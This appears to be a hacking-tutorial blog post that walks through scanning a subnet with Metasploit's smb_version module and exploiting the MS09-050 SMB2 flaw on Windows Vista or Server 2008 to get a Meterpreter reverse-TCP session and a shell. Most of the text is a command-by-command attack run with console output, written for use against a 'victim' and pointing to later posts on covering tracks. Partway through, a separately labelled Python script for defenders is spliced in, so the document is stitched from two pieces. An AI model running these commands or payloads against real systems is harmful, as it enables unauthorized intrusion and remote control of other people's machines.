How to Hack Like a Pro: Hacking Windows Vista by Exploiting SMB2 Vulnerabilities
Hi, gang! Time for another hack using Metasploit.
We have exploited Windows XP (a very insecure operating system) and we have exploited Ubuntu and installed Meterpreter on a Linux system exploiting the Samba service. Several of you have asked for a hack on more modern Windows systems, so here goes.
In this module, we hack into Windows Vista or Windows Server 2008 using a vulnerability found in SMB2. As you know, SMB2 is an application-level protocol used to share files, folders and printers on Windows systems. SMB2 is the revised version of Microsoft's SMB; it was introduced in 2006 and is used in Windows Vista and Windows Server 2008 (SMB and SMB2 have been plagued with security vulnerabilities from the very beginning).
So… let's get started. Boot up your Linux operating system, open a terminal, and load the Metasploit Framework.
Before we begin to exploit, we need to scan the network to find the SMB identifiers for the systems we want to hack. Metasploit has multiple auxiliary modules that can help us with many of the preliminary tasks of hacking, such as scanning our victim network to obtain necessary information. In this case, we will use the auxiliary module scanner/smb/smb_version to scan the network.
msf > use scanner/smb/smb_version
Next, we need to see our options.
msf auxiliary(smb_version) > show options
Notice from the screen capture that Metasploit displays our options for this auxiliary module.
Note here that we need to set our RHOSTS and THREADS. We set our RHOSTS to our targeted address range, in this case 192.168.1.0 through 192.168.1.255 (yours may be different depending upon your network).
msf auxiliary(smb_version) > set RHOSTS 192.168.1.0-192.168.1.255
RHOSTS => 192.168.1.0-192.168.1.255
We then set the number of concurrent threads to 50.
msf auxiliary(smb_version) > set THREADS 50
THREADS => 50
By typing show options again, we can see that Metasploit has set our options as we have defined them.
msf auxiliary(smb_version) > show options
If we have done everything correctly, Metasploit will show that we have set our options properly.
Next, we need to run our SMB scan on the network.
msf auxiliary(smb_version) > run
We can see that this scan returns results for every machine on the defined network, giving us critical information: the operating system version, the service pack, and the computer name. In my screenshot example, I have just one computer on the network, and the scan correctly identifies its operating system, service pack, and computer name.
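The same smb_version output is useful from the defender's side: an administrator can feed the scanner's lines into a small script that inventories which hosts report an SMB2-era operating system (Windows Vista or Windows Server 2008, the releases the article names) so their MS09-050 patch status can be checked first. The example below is added here and is not part of the original article or of Metasploit; the sample lines are constructed, and the exact wording of smb_version output is an assumption that varies between Metasploit versions, so adjust the regular expression to match your own scan.

```python
import re

# Constructed sample lines in the general shape of smb_version output
# (assumption: real output wording differs between Metasploit versions).
SAMPLE_SCAN_OUTPUT = """\
[*] 192.168.1.100:445 is running Windows Vista Service Pack 1 (language: Unknown) (name:VISTA-PC) (domain:WORKGROUP)
[*] 192.168.1.101:445 is running Windows 2008 Service Pack 1 (language: Unknown) (name:FILESRV) (domain:WORKGROUP)
[*] 192.168.1.102:445 is running Windows XP Service Pack 3 (language: English) (name:OLDBOX) (domain:WORKGROUP)
[*] 192.168.1.103:445 is running Windows 7 Ultimate (language: Unknown) (name:WIN7) (domain:WORKGROUP)
[*] Scanned 256 of 256 hosts (100% complete)
"""

# One scanner result line: "[*] <ip>:<port> is running <os> (language: ..) (name:..) (domain:..)".
# The trailing parenthesised fields are optional so partial lines still parse.
LINE_RE = re.compile(
    r"^\[\*\] (?P<ip>\d{1,3}(?:\.\d{1,3}){3}):(?P<port>\d+) is running "
    r"(?P<os>.+?)"
    r"(?: \(language: (?P<lang>[^)]*)\))?"
    r"(?: \(name:(?P<name>[^)]*)\))?"
    r"(?: \(domain:(?P<domain>[^)]*)\))?\s*$"
)
SP_RE = re.compile(r"Service Pack (?P<sp>\d+)")

# OS families covered by MS09-050 according to the article: Windows Vista and
# Windows Server 2008 (smb_version may print "Windows 2008" without "Server").
MS09_050_FAMILY_RE = re.compile(r"Windows (Vista|(Server )?2008)\b", re.IGNORECASE)


def parse_scan(text):
    """Turn raw smb_version console output into a list of host records."""
    hosts = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # progress lines and other noise carry no host data
        sp = SP_RE.search(m.group("os"))
        hosts.append({
            "ip": m.group("ip"),
            "port": int(m.group("port")),
            "os": m.group("os"),
            "service_pack": sp.group("sp") if sp else None,
            "name": m.group("name"),
            "domain": m.group("domain"),
        })
    return hosts


def in_scope_for_ms09_050(hosts):
    """Return the hosts whose reported OS family is one MS09-050 applies to.

    The fingerprint alone does not prove a host is unpatched; it only tells
    the administrator which machines need their patch status verified.
    """
    return [h for h in hosts if MS09_050_FAMILY_RE.search(h["os"])]


def patch_review_report(text):
    """Human-readable list of hosts to verify, one per line."""
    lines = []
    for h in in_scope_for_ms09_050(parse_scan(text)):
        sp = f"SP{h['service_pack']}" if h["service_pack"] else "no SP reported"
        lines.append(f"{h['ip']:<15} {h['name'] or '?':<12} {h['os']} ({sp}) -> verify MS09-050 is installed")
    return "\n".join(lines)


if __name__ == "__main__":
    print(patch_review_report(SAMPLE_SCAN_OUTPUT))
```

Running the script against the constructed sample flags the Vista and 2008 hosts and ignores the XP and Windows 7 machines, which do not speak SMB2 in the form the article targets (XP) or are outside the bulletin's scope as the article describes it (Windows 7). A real scan would then be followed by checking each flagged host for the MS09-050 update rather than assuming the fingerprint means it is vulnerable.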
Now that we know there are systems available that are using SMB, we can load the appropriate module in Metasploit, in this case ms09_050_smb2_negotiate_func_index.
msf auxiliary(smb_version) > use windows/smb/ms09_050_smb2_negotiate_func_index
To learn more about this exploit module, we can simply type info.
msf exploit(ms09_050_smb2_negotiate_func_index) > info
As you can see in the screenshot above, Metasploit provides us critical background information on this exploit.
Now we set our payload to a Windows Meterpreter reverse TCP payload.
msf exploit(ms09_050_smb2_negotiate_func_index) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
We then need to set RHOST to the target's address and LHOST to our own address, which the payload connects back to.
msf exploit(ms09_050_smb2_negotiate_func_index) > set RHOST 192.168.1.100
RHOST => 192.168.1.100
msf exploit(ms09_050_smb2_negotiate_func_index) > set LHOST 192.168.1.111
LHOST => 192.168.1.111
We need to check to make certain our options are set properly by typing show options.
msf exploit(ms09_050_smb2_negotiate_func_index) > show options
Finally, we exploit SMB2 on the Vista system.
msf exploit(ms09_050_smb2_negotiate_func_index) > exploit
The Vista system then returns a Meterpreter prompt and we type sysinfo.
meterpreter > sysinfo
OS : Windows Vista (Build 6001, Service Pack 1).
Arch : x86
We then type shell to get a shell on our victim system.
meterpreter > shell
You have now successfully hacked the Windows Vista box. If this hack doesn't work the first time, try again. Hacking is often a matter of probabilities, and not every exploit works every time.
Look for future how-to articles on using Meterpreter to control the owned box, pivoting further attacks from it, and covering your tracks.